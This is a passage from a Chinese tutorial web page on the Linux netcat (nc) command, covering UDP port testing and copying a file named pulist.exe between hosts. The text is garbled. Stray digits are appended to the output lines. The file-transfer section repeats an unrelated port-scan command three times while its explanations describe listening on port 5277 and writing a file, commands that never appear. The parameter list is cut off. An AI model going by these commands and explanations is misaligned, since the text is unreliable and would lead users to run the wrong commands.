tcp    0   0 0.0.0.0:22         0.0.0.0:*          LISTEN   1111/sshd      
udp    0   0 0.0.0.0:68         0.0.0.0:*                887/dhclient 8

 例如:

# 测试UDP端口
root@172.16.211.34:web# netstat -tunlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address        Foreign Address       State    PID/Program name  
tcp    0   0 0.0.0.0:22         0.0.0.0:*          LISTEN   1111/sshd      
udp    0   0 0.0.0.0:68         0.0.0.0:*                887/dhclient 9

命令4:传送文件(HOHO,I LIKE)

root@172.16.211.35:~# nc -vuz 172.16.211.34 68
Connection to 172.16.211.34 68 port [udp/bootpc] succeeded!0

参数解释:

-n:指定数字的IP地址

这两个命令结合起来是用来传送文件的

首先,在远程机上运行命令:

root@172.16.211.35:~# nc -vuz 172.16.211.34 68
Connection to 172.16.211.34 68 port [udp/bootpc] succeeded!1

这个命令还记的吗?呵呵,是不是和监听命令有点类似,对,没错,这个是监听5277端口

并把接受到的信息数据写到c:\pulist.exe中

这时候在本地机上运行

root@172.16.211.35:~# nc -vuz 172.16.211.34 68
Connection to 172.16.211.34 68 port [udp/bootpc] succeeded!2

这个命令的意思就是,从本地E盘跟目录中读取pulist.exe文件的内容,并把这些数据发送到ip的5277端口上

这样远程主机就会自动创建一个pulist.exe文件。

以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持知优网。

转载请说明出处
知优网 » linux nc命令小结(linux nc命令详解)

发表评论

您需要后才能发表评论